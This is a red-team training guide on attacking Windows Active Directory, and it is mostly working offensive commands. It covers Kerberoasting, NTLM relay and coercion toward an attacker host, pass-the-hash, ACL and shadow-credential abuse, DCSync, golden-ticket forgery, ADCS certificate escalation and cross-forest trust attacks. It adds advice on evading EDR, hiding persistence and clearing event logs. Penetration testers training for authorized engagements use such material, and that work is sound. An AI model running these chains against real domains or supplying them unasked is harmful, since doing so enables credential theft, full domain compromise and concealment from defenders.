Pillar 2: Windows & Active Directory Attacks

BLUF: Active Directory is the primary attack surface in 95% of enterprise engagements. BloodHound paths, Kerberos abuse, and delegation misconfigurations will get you Domain Admin. Know these attack chains cold.

Attack Path Overview

graph TB
    Foothold([Initial Access]) --> Enum[BloodHound Enumeration]
    Enum --> Kerb[Kerberos Attacks]
    Enum --> Relay[NTLM Relay]
    Enum --> Coerce[Coercion - PetitPotam/Coercer]
    Kerb --> Kerberoast[Kerberoasting]
    Kerb --> ASREP[AS-REP Roasting]
    Relay --> PtH[Pass-the-Hash]
    Relay --> PtT[Pass-the-Ticket]
    PtH --> ACL[ACL/Delegation Abuse]
    PtT --> ACL
    Coerce --> Relay
    ACL --> ADCS[ADCS ESC1/ESC8]
    ACL --> ShadowCreds[Shadow Credentials]
    ACL --> DCSync[DCSync/Golden Ticket]
    ADCS --> DCSync
    ShadowCreds --> DCSync
    DCSync --> CrossForest[Cross-Forest Trust Abuse]
    CrossForest --> DA([Domain Admin / Full Compromise])
    style Foothold fill:#ff6600
    style DA fill:#ff0000

MITRE ATT&CK Mapping

Action Item 1 — BloodHound Enumeration & Attack Path Discovery [Beginner]

BloodHound uses graph theory to reveal hidden relationships and attack paths in Active Directory. It is the first step in any AD engagement to identify the shortest path to Domain Admin.

What you're building: A graph model of every trust relationship in the domain — who owns what, who can write where, who has a path to Domain Admin. Every subsequent action item depends on this map.

Tactic: Discovery

Technique: AD Graph-Based Enumeration & Pathfinding — Think of it like being handed a corporate org chart with all the back-channels included: who reports to whom, who has a key to the server room, and who left their desk unlocked.

The goal before touching anything else: build the attack graph — every edge you add is a potential path to DA. Rushing to exploitation without the map is how you miss the easy win and make noise.

Procedure — "First 15 Minutes in the Domain"

Work through these phases in order. SharpHound first, then enumerate specific attack surface areas.

Phase 1 — Identity & Scope (Who and What Am I Looking At?)

# Who am I in the domain context?
whoami /all                          # current user, groups, privileges
net user %USERNAME% /domain          # domain group memberships
gpresult /r                          # applied GPOs — can reveal misconfigs

# Domain basics
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
nltest /dclist:domain.local          # which DCs exist?
nslookup domain.local                # DNS resolution confirms domain connectivity

Why: Knowing your starting position (user, groups, DA vs workstation admin) determines which attack chains are immediately available.

Phase 2 — BloodHound Collection (The Graph)

# Standard: noisy but complete — use in red team / non-prod environments
.\SharpHound.exe -c All --ZipFileName collection.zip

# Stealthy: DC-only LDAP — lower noise, still gets you the graph
.\SharpHound.exe -c DCOnly --Domain domain.local --LdapUser user --LdapPass pass

# Session hunting: find where DA is logged in (run in loop for 2h)
.\SharpHound.exe -c Session --Loop --LoopDuration 02:00:00

# From Linux (no Windows foothold needed)
bloodhound-python -u 'username' -p 'password' -d 'domain.local' -dc 'dc01.domain.local' -c All

Why: SharpHound's DCOnly collection only queries LDAP — it avoids touching workstations (which trigger EDR) while still giving you ACL chains, delegation configs, and group memberships.

Phase 3 — PowerView Quick Wins (Before Importing Data)

# Accounts with no pre-auth (AS-REP roastable)
Get-DomainUser -PreauthNotRequired | select samaccountname

# Accounts with SPNs (Kerberoastable)
Get-DomainUser -SPN | select samaccountname, serviceprincipalname

# Computers with unconstrained delegation (coerce → TGT capture)
Get-DomainComputer -Unconstrained | select name, dnshostname

# GPO names (spot "admin", "password reset", unusual ones)
Get-DomainGPO | select displayname, gpcpath

# Trust relationships
Get-DomainTrust | select source, target, trusttype

Phase 4 — BloodHound Cypher Queries (Find the Path)

// Find shortest path to Domain Admin
MATCH (n:User),(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'}),p=shortestPath((n)-[*1..]->(m)) RETURN p

// Find all users with DCSync rights
MATCH p=(n:User)-[:DCSync|AllExtendedRights]->(m:Domain) RETURN p

// Find computers with Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

// Find all users with GenericAll over a Group
MATCH p=(u:User)-[:GenericAll]->(g:Group) RETURN p

// Find all paths from owned principals to DA
MATCH (n:User {owned:true}),(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'}),p=shortestPath((n)-[*1..]->(m)) RETURN p

// Find Service Principals with dangerous rights
MATCH p=(s:ServiceAccount)-[:GenericAll|WriteDacl|Owns]->(m) RETURN p

OPSEC: SharpHound's default collection is extremely noisy. EDRs often flag the .zip creation and the mass LDAP queries. Use --Stealth and --RandomizeFilenames. Avoid --Loop in high-security environments.

Action Item 2 — Kerberoasting & AS-REP Roasting [Beginner]

Kerberos-based attacks target the service ticket request process to obtain crackable hashes for service accounts or accounts without pre-authentication.

Technique: Kerberos Ticket Abuse & Offline Cracking

Tools: Rubeus, Impacket (GetUserSPNs.py, GetNPUsers.py), Hashcat

Procedure:

# Kerberoast all users with SPNs and output to file
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Targeted Kerberoasting (less noisy)
.\Rubeus.exe kerberoast /user:svc_sql /outfile:sql_hash.txt

# Kerberoast and output in Hashcat format directly
.\Rubeus.exe kerberoast /format:hashcat /outfile:hashes_hc.txt

# AS-REP Roasting: Find accounts with 'Do not require Kerberos preauthentication' set
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

# Kerberoast with /nowrap for easier copy-pasting
.\Rubeus.exe kerberoast /nowrap

# Request a specific TGS and dump it (FIXED: correct command is asktgs, not askgs)
.\Rubeus.exe asktgs /service:cifs/dc01.domain.local /nowrap

# Kerberoasting from Linux (Impacket)
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request

# AS-REP Roasting from Linux (Impacket)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

Cracking with Hashcat:

# Kerberoast (TGS-REP) - Mode 13100
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# AS-REP (Pre-Auth Disabled) - Mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# AES Kerberoast (if RC4 is disabled) - Mode 19600 (AES128) or 19700 (AES256)
hashcat -m 19700 aes_hashes.txt wordlist.txt

Quick Reference: Kerberos Encryption Types

OPSEC: Avoid requesting tickets for all SPNs at once. Honey-SPNs are a common detection mechanism. Check for accounts with high pwdlastset values first, as they are more likely to have weak passwords.

Action Item 3 — NTLM Relay Attacks [Intermediate]

NTLM relaying exploits the lack of SMB signing or LDAP signing to intercept authentication and perform actions on behalf of the victim.

Technique: NTLM Relaying, RBCD Escalation & Coercion

Tools: Responder, ntlmrelayx.py, mitm6, PetitPotam, Coercer

Procedure:

# 1. Identify targets with SMB Signing Disabled
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

# 2. Configure Responder (Disable SMB/HTTP in Responder.conf)
sudo responder -I eth0 -rdw

# 3. Relay to SMB for command execution
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami /all"

# 4. Relay to LDAP for Resource-Based Constrained Delegation (RBCD)
# This creates a computer account and sets msDS-AllowedToActOnBehalfOfOtherIdentity
ntlmrelayx.py -t ldap://dc01.domain.local --delegate-access --escalate-user 'attacker_user'

# 5. Relay to MSSQL to execute queries
ntlmrelayx.py -t mssql://sql01.domain.local -q "SELECT @@version"

# 6. Use SOCKS proxy for relayed sessions
ntlmrelayx.py -tf targets.txt -smb2support -socks

# 7. Relay to HTTP (ADCS) for certificate enrollment
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController

# IPv6 Takeover with mitm6
# Forces victims to use the attacker as DNS server, then relays to LDAPS
sudo mitm6 -d domain.local
ntlmrelayx.py -6 -t ldaps://dc01.domain.local -wh fake-wpad.domain.local --delegate-access

Coercion Attacks (Force Authentication — No User Interaction)

# PetitPotam: Coerce a machine to authenticate to you via MS-EFSRPC
# Unauthenticated on unpatched hosts; requires domain user post-patch
python3 PetitPotam.py -u '' -p '' attacker_ip dc01.domain.local

# Coercer: Automated coercion via multiple protocols (EFS, Print, DNS, etc.)
python3 Coercer.py coerce -u domain_user -p password -d domain.local \
  --listener-ip attacker_ip --target dc01.domain.local

# Chain: Coerce DC -> relay to ADCS Web Enrollment -> get DC certificate -> DCSync
# 1. Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
# 2. Trigger coercion
python3 PetitPotam.py attacker_ip dc01.domain.local
# 3. Use obtained certificate (PKINITtools)
python3 gettgtpkinit.py domain.local/dc01$ -pfx-base64 $(cat cert.b64) dc01.ccache
export KRB5CCNAME=dc01.ccache
python3 getnthash.py domain.local/dc01$ -key <AS-REP-key>

Why coercion matters: Unlike Responder (which waits for traffic), coercion forces the target to authenticate to you immediately — no waiting required.

OPSEC: Responder poisoning is highly detectable. Use -A (Analyze mode) first to see what traffic is available before starting active poisoning. In modern Windows, WPAD is often disabled, making mitm6 more effective.

Action Item 4 — Pass-the-Hash / Pass-the-Ticket / Overpass-the-Hash [Intermediate]

Lateral movement without plaintext credentials by reusing NTLM hashes or Kerberos tickets.

Technique: Credential & Ticket Reuse

Tools: Mimikatz, Rubeus, Impacket (wmiexec.py, smbexec.py)

Procedure:

# Pass-the-Hash (PtH) with Mimikatz
# Spawns a new process with the identity of the target user
privilege::debug
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:HASH_HERE /run:cmd.exe

# Pass-the-Ticket (PtT) with Rubeus
# Imports a .kirbi ticket into the current session
.\Rubeus.exe ptt /ticket:base64_ticket_here

# Overpass-the-Hash (OtH)
# Converts an NTLM hash into a Kerberos TGT
.\Rubeus.exe asktgt /user:user /domain:domain.local /rc4:HASH_HERE /ptt

# List tickets in current session
.\Rubeus.exe triage

# Purge all tickets from current session
.\Rubeus.exe purge

# Renew a ticket
.\Rubeus.exe renew /ticket:base64_ticket_here

# Lateral movement from Linux (Impacket)
wmiexec.py domain.local/user@10.10.10.10 -hashes :HASH_HERE
smbexec.py domain.local/user@10.10.10.10 -hashes :HASH_HERE
psexec.py domain.local/user@10.10.10.10 -hashes :HASH_HERE

OPSEC: PtH is often flagged by EDR as it involves LSASS access. PtT is stealthier as it uses legitimate Kerberos flows. Avoid smbexec and psexec if possible; wmiexec is slightly quieter as it uses WMI for execution.

Action Item 5 — ACL Abuse, Delegation & Shadow Credentials [Intermediate]

Exploiting misconfigured permissions on AD objects or abusing Kerberos delegation features to impersonate users. Shadow Credentials is a modern alternative to password resets — it adds a Key Credential to a target without triggering password-change events.

Technique: ACL Exploitation, Delegation Abuse & Shadow Credentials

Tools: PowerView, Rubeus, StandIn, Whisker, pyWhisker

Procedure:

# Enumerate interesting ACLs with PowerView
Find-InterestingDomainAcl | ?{$_.IdentityReferenceName -match "attacker_user"}

# Abuse GenericAll on a user: Change their password
Set-DomainUserPassword -Identity 'target_user' -AccountPassword 'NewPassword123!'

# Abuse WriteDACL on the Domain object: Grant yourself DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity "attacker_user" -Rights DCSync

# Constrained Delegation (S4U2Proxy)
# Impersonate Administrator on a target service
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.domain.local /user:svc_account /rc4:HASH_HERE /ptt

# Resource-Based Constrained Delegation (RBCD)
# Set the attribute manually if you have GenericWrite on the computer object
$SD = New-Object Security.AccessControl.RawSecurityDescriptor("...")
Set-ADComputer -Identity target_comp -Replace @{"msDS-AllowedToActOnBehalfOfOtherIdentity"=$SD.BinaryForm}

# Abuse ForceChangePassword
Set-DomainUserPassword -Identity 'target_user' -AccountPassword 'NewPassword123!' -Force

# Abuse WriteProperty on a Group to add a member
Add-DomainGroupMember -Identity "Domain Admins" -PrincipalIdentity "attacker_user"

Shadow Credentials (Whisker / pyWhisker)

# Requires: GenericWrite or WriteProperty (ms-DS-Key-Credential-Link) on the target object
# Effect: Adds a Key Credential to the target — lets you request a TGT as them via PKINIT
# Advantage over password reset: no password change event, harder to detect

# Windows: Whisker
.\Whisker.exe add /target:victim_user /domain:domain.local /dc:dc01.domain.local

# Linux: pyWhisker
python3 pywhisker.py -d domain.local -u attacker -p password \
  --target victim_user --action add

# Both output a Rubeus command to get the TGT — run it to get a TGT as victim_user
.\Rubeus.exe asktgt /user:victim_user /certificate:<cert.pfx> /password:<pfx_pass> /ptt

# List existing Key Credentials on an object
.\Whisker.exe list /target:victim_user /domain:domain.local /dc:dc01.domain.local

# Clean up: remove Key Credential after use
.\Whisker.exe remove /target:victim_user /domain:domain.local /dc:dc01.domain.local /id:<guid>

OPSEC: ACL modifications are persistent and leave a trail in the AD database. Always have a cleanup plan. Shadow Credentials are stealthy — no password change event — but do write to the ms-DS-Key-Credential-Link attribute, which is audited in mature environments.

Action Item 6 — DCSync, Golden Tickets & Silver Tickets [Advanced]

Achieving domain dominance by extracting the krbtgt hash or forging tickets for long-term persistence.

Technique: Domain Dominance & Persistence

Tools: Mimikatz, Impacket (secretsdump.py)

Procedure:

# DCSync: Requires 'Replicating Directory Changes' rights
# Extract krbtgt hash without touching the NTDS.dit file
lsadump::dcsync /domain:domain.local /user:krbtgt

# Forge a Golden Ticket (TGT)
# Valid for 10 years by default; allows impersonation of any user
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH_HERE /id:500 /ptt

# Forge a Silver Ticket (TGS)
# Only works for a specific service on a specific host
kerberos::silver /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:dc01.domain.local /service:cifs /rc4:MACHINE_HASH_HERE /ptt

# Skeleton Key: Patch LSASS to accept a master password (extremely noisy)
misc::skeleton

# Dump SAM hashes locally
lsadump::sam

# Dump LSA secrets
lsadump::secrets

# DCSync from Linux
secretsdump.py domain.local/user:password@10.10.10.10 -just-dc-user krbtgt

# Dump all hashes from NTDS.dit (requires local admin on DC)
secretsdump.py -ntds ntds.dit -system system.hive LOCAL

OPSEC: DCSync is a high-fidelity alert in most SOCs. Golden Tickets can be detected by looking for TGTs with unusual lifetimes or those that don't match the domain's password policy. Use a realistic lifetime (e.g., 10 hours) for better stealth.

Action Item 6.5 — ADCS Certificate Abuse (ESC1, ESC8, ESC13) [Advanced]

Active Directory Certificate Services (ADCS) misconfigurations are some of the most impactful and overlooked privilege escalation paths. ESC1 lets any domain user request a certificate as any principal including Domain Admins. ESC8 lets you relay NTLM authentication to the ADCS web enrollment endpoint.

Technique: Certificate-Based Privilege Escalation & Domain Persistence (T1649)

Tools: Certipy, ntlmrelayx.py, PKINITtools

Procedure:

# --- Enumeration ---
# Find all vulnerable certificate templates and CA configurations
certipy find -u 'user@domain.local' -p 'password' -dc-ip 10.10.10.10 -vulnerable -stdout

# --- ESC1: Misconfigured Template (any user can enroll as any SAN) ---
# Requires: Certificate template allows requester-supplied SANs + has dangerous EKUs
# 1. Request a certificate as the Domain Admin
certipy req -u 'lowpriv@domain.local' -p 'password' -ca 'domain-CA' \
  -template 'VulnerableTemplate' -upn 'administrator@domain.local' -dc-ip 10.10.10.10

# 2. Authenticate using the obtained certificate to get NT hash
certipy auth -pfx administrator.pfx -domain domain.local -dc-ip 10.10.10.10

# --- ESC8: NTLM Relay to ADCS HTTP Enrollment ---
# Requires: ADCS Web Enrollment endpoint without Extended Protection for Auth
# 1. Set up relay targeting ADCS HTTP endpoint
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
# 2. Coerce DC authentication (PetitPotam or Coercer)
python3 PetitPotam.py attacker_ip dc01.domain.local
# 3. Certificate is saved — use PKINITtools to get TGT
python3 gettgtpkinit.py domain.local/dc01$ -pfx-base64 $(cat cert.b64) dc01.ccache
export KRB5CCNAME=dc01.ccache
python3 getnthash.py domain.local/dc01$ -key <enc_key>

# --- ESC13: OID Group Link Escalation ---
# Requires: Certificate template linked to a high-privilege OID group
# Request the template — the resulting certificate grants group membership implicitly
certipy req -u 'lowpriv@domain.local' -p 'password' -ca 'domain-CA' \
  -template 'ESC13Template' -dc-ip 10.10.10.10
certipy auth -pfx lowpriv.pfx -domain domain.local -dc-ip 10.10.10.10
# Resulting TGT will include the privileged group membership in the PAC

# --- Persistence: Domain Persistence via CA Root Cert Forgery ---
# With DA: forge any certificate valid for any principal (requires CA private key)
certipy forge -ca-pfx ca.pfx -upn administrator@domain.local -subject 'CN=Administrator'
certipy auth -pfx administrator_forged.pfx -domain domain.local -dc-ip 10.10.10.10

ESC Vulnerability Quick Reference:

OPSEC: Certificate requests are logged in the CA's database but are rarely monitored in real time. ESC8 relaying generates NTLM authentication events on the DC — use alongside coercion to avoid waiting for organic auth. After exploitation, revoke the certificate if within scope.

Action Item 7 — Cross-Forest Trust Abuse [Advanced]

Pivoting between forests by abusing trust relationships, often targeting the SID History attribute to escalate to Enterprise Admin.

Technique: Inter-Forest Pivoting

Tools: Mimikatz, PowerView, BloodHound

Procedure:

# Enumerate trusts and identify 'Forest' or 'External' types
Get-DomainTrust
nltest /domain_trusts
Get-ADTrust -Filter *
nltest /dsgetdc:domain.local

# SID History Injection (Cross-Forest)
# Requires the krbtgt hash of the child domain or the trust key
kerberos::golden /user:Administrator /domain:child.forestA.local /sid:S-1-5-21-CHILD /krbtgt:HASH_HERE /sids:S-1-5-21-ROOT-519 /ptt

# Abuse Selective Authentication
# Coerce a DC in the trusted forest to authenticate back to you (Printer Bug)
.\SpoolSample.exe target_dc attacker_machine

# Request an inter-realm TGT using the trust key
.\Rubeus.exe asktgt /user:user /domain:forestA.local /rc4:TRUST_KEY /ptt

# Enumerate forest trusts with PowerView
Get-DomainForestTrust

# Get Domain Controllers in the trusted forest
Get-DomainController -Domain forestB.local

OPSEC: Trust attacks are complex and often involve multiple network segments. Ensure your pivot host has the necessary connectivity to the target forest's DCs. SID Filtering is often enabled on modern trusts, which may block SID History injection.

Action Item 8 — Full AD Attack Chain [Operator]

Executing a complete engagement from initial access to full forest compromise while maintaining a low profile.

Technique: End-to-End AD Kill Chain Execution

Tools: Full Red Team Arsenal

Procedure:

1. Recon: Passive LDAP enumeration and BloodHound collection (DCOnly). Identify high-value targets and potential paths. Check for GPP passwords in SYSVOL. Enumerate ADCS with Certipy (-vulnerable).
2. Initial Access: Kerberoasting or NTLM Relay to gain a foothold as a service account. Crack the hash or relay to a non-signing target. Use mitm6 if Responder is blocked.
3. PrivEsc: Identify ACL paths (e.g., GenericWrite on a Group) to escalate to a Tier-1 or Tier-0 account. Check for ADCS ESC1/ESC8 — often the fastest path to DA. Use Shadow Credentials if you have GenericWrite on a high-value account.
4. Lateral Movement: Use Rubeus monitor to capture TGTs of users logging into compromised machines. Pivot using wmiexec or Invoke-Command. Avoid RDP if possible.
5. Persistence: Deploy a Golden Ticket or a hidden GPO that grants you local admin on all workstations. Create a hidden scheduled task or a WMI event subscription. Consider an ADCS-based persistence mechanism (forged certificate valid for years).
6. Cleanup: Revert ACL changes, delete temporary computer accounts created during RBCD, revoke obtained certificates, and clear event logs (if within scope). Remove any dropped binaries.

Common AD Service Ports:

OPSEC: The "Operator" mindset is about choosing the path of least resistance. If a simple Kerberoast gets you DA, don't bother with complex cross-forest trust abuse unless required by the objective. Always assume you are being watched and document every action for the final report.

Resources

Part of the Red Teaming 101 series.